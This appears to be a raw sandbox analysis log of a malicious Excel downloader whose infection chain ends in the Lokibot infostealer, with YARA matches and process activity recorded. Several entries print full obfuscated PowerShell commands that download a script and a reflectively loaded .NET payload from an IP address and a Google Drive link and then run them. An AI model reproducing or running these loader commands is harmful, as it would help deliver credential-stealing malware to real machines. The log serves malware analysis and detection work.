                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89A81E3D6_2_000007FE89A81E3D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_0040549C16_2_0040549C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_004029D416_2_004029D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_00B7205016_2_00B72050
                Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxOLE indicator, VBA macros: true
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00405B6F appears 42 times
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2262
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2262Jump to behavior
                Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: Process Memory Space: powershell.exe PID: 3036, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: AddInProcess32.exe PID: 1488, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@18/28@4/6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,16_2_0040650A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,16_2_0040434D
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8229.tmpJump to behavior
                Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxOLE indicator, Workbook stream: true
                Source: 09230000.0.drOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.m.......m.....P?......................P?......X?.......................3......................P?..............Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................@...............Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................+k....}..w....@.......\.......................(.P.....................................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w..............V.....8.+k......U.....(.P.....................................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................+k....}..w....@.......\.......................(.P.....................................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w..............V.....8.+k......U.....(.P.....................................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...V.....8.+k......U.....(.P............................. .......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.e.V.I.C.E.C.r.E.d.e.n.T.I.a.L.D.e.P.l.O.Y.M.E.N.T...e.x.e.........................@.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w..............V.....8.+k......U.....(.P.....................................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w..............V.....8.+k......U.....(.P.............................l.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@.......}..w..............V.....8.+k......U.....(.P.....................................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......H...............@]..............Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................H...............................Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxReversingLabs: Detection: 36%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exeJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP"Jump to behavior
